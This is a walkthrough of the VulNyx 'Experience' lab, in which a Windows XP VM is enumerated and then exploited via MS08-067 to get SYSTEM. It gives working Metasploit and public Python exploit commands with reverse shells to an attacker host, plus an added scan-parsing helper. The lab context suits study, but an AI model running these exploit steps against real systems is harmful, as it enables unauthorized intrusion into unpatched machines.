VulNyx | Experience (Walkthrough)

d4t4s3c
5 min read · Jan 22, 2024

Experience is an easy-difficulty Windows machine from the VulNyx platform, created by d4t4s3c, and it runs correctly in VirtualBox.

Skills:

  • SMB Enumeration
  • MS08-067 (CVE-2008-4250)

Nmap

❯ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.1.50

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-22 11:10 CET
Nmap scan report for 192.168.1.50
Host is up (0.00031s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:B7:E5
❯ nmap -n -Pn -sVC -p135,139,445 192.168.1.50

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-22 11:11 CET
Nmap scan report for 192.168.1.50
Host is up (0.00044s latency).

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
MAC Address: 08:00:27:B7:E5:9C (Oracle VirtualBox virtual NIC)
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: experience
| NetBIOS computer name: EXPERIENCE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-01-22T11:11:36-08:00
|_nbstat: NetBIOS name: EXPERIENCE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b7:e5:9c (Oracle VirtualBox virtual NIC)
|_clock-skew: mean: 12h59m57s, deviation: 5h39m24s, median: 8h59m57s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)

135 msrpc Microsoft Windows RPC
139 netbios-ssn Microsoft Windows netbios-ssn
445 microsoft-ds Windows XP microsoft-ds

Port: 445 (SMB)

I run a basic SMB enumeration with NetExec.

❯ nxc smb 192.168.1.50
SMB 192.168.1.50 445 EXPERIENCE [*] Windows 5.1 x32 (name:EXPERIENCE) (domain:experience) (signing:False) (SMBv1:True)

Since the host is Windows XP and its SMB implementation is very old, I launch Nmap's NSE scripts to detect possible vulnerabilities.

❯ nmap -p445 --script="smb-vuln-*" 192.168.1.50

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-22 11:35 CET
Nmap scan report for experience.home (192.168.1.50)
Host is up (0.00038s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:B7:E5:9C (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
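
Reading the smb-vuln-* results by eye is fine for one host, but across a whole subnet it helps to parse them. The following is an added example, not code from the original walkthrough: a small Python parser that pulls each script's state, CVE IDs and disclosure date out of Nmap host-script output, run over a constructed sample modelled on the output above.

```python
import re

# Constructed sample modelled on the smb-vuln-* NSE output above (not the page's verbatim text).
SAMPLE_NSE_OUTPUT = """\
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     Disclosure date: 2008-10-23
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Disclosure date: 2017-03-14
|_    https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
"""

SCRIPT_RE = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):\s*(.*)$")  # start of a script block
STATE_RE = re.compile(r"State:\s*(\w+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
DATE_RE = re.compile(r"Disclosure date:\s*(\d{4}-\d{2}-\d{2})")

def parse_smb_vuln(text):
    """Map each smb-vuln-* script to its state, CVE list and disclosure date."""
    findings, current = {}, None
    for line in text.splitlines():
        m = SCRIPT_RE.match(line)
        if m:  # one-line results ('false', 'ERROR: ...') keep that literal as their state
            current = m.group(1)
            findings[current] = {"state": m.group(2).strip() or None, "cves": [], "disclosed": None}
            continue
        if current is None or not line.startswith("|"):
            continue  # not inside a host-script block
        f = findings[current]
        if (s := STATE_RE.search(line)):
            f["state"] = s.group(1)
        f["cves"].extend(c for c in CVE_RE.findall(line) if c not in f["cves"])
        if (d := DATE_RE.search(line)):
            f["disclosed"] = d.group(1)
    return findings

def vulnerable(findings):
    """Script names reported VULNERABLE, oldest disclosure first (longest-unpatched at the top)."""
    hits = [(k, v) for k, v in findings.items() if v["state"] == "VULNERABLE"]
    return [k for k, v in sorted(hits, key=lambda kv: kv[1]["disclosed"] or "")]
```

Feed it `nmap -oN` output for several hosts and the `vulnerable()` list gives a patch-priority order straight from the scan.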

MS08-067 (CVE-2008-4250)

Automatic Exploitation (Metasploit)

I load the ms08_067_netapi module and set all the required options.

❯ msfconsole -q
msf6 > search MS08-067

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.1.50
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.1.53
msf6 exploit(windows/smb/ms08_067_netapi) > set LPORT 443

I launch the exploit and get a shell as NT AUTHORITY\SYSTEM.

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.1.53:443
[*] 192.168.1.50:445 - Automatically detecting the target...
[*] 192.168.1.50:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.1.50:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.1.50:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.53:443 -> 192.168.1.50:1028) at 2024-01-22 11:40:03 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Manual Exploitation (Python Exploit)

I search for public exploits for MS08-067.

https://gist.github.com/jrmdev/5881544269408edde11335ea2b5438de

I launch the exploit ms08-067.py.

❯ python3 ms08-067.py 192.168.1.50 6 445 192.168.1.53 443


Windows XP SP3 English (NX)

[+] Generating shellcode ...
[+] Initiating connection ...
[+] Connected to ncacn_np:192.168.1.50[\pipe\browser]
[+] Setting up listener ...

I get the shell as NT AUTHORITY\SYSTEM.

❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.53] from (UNKNOWN) [192.168.1.50] 1028
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

The OS is old and does not ship the whoami binary, so I look for the one included in Kali and share it over SMB by bringing up a share named a.

❯ find / -name whoami.exe 2>/dev/null
/usr/share/windows-resources/binaries/whoami.exe
❯ cp /usr/share/windows-resources/binaries/whoami.exe .
❯ impacket-smbserver a $(pwd)
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

I run whoami again, this time pointing at the whoami.exe on my share, and confirm that I am NT AUTHORITY\SYSTEM.

C:\WINDOWS\system32>//192.168.1.53/a/whoami.exe

NT AUTHORITY\SYSTEM

Now, as NT AUTHORITY\SYSTEM, I can read the user.txt and root.txt flags.

C:\Documents and Settings\bill\Desktop>dir

Volume in drive C has no label.
Volume Serial Number is 8842-9464

Directory of C:\Documents and Settings\bill\Desktop

01/21/2024 11:41 AM <DIR> .
01/21/2024 11:41 AM <DIR> ..
01/21/2024 11:41 AM 35 root.txt
01/21/2024 11:41 AM 35 user.txt
2 File(s) 70 bytes
2 Dir(s) 7,828,291,584 bytes free

C:\Documents and Settings\bill\Desktop>type *.txt

c1d5e7e*************************
f9e24c8*************************

That's it for the Experience machine.

Happy Hacking!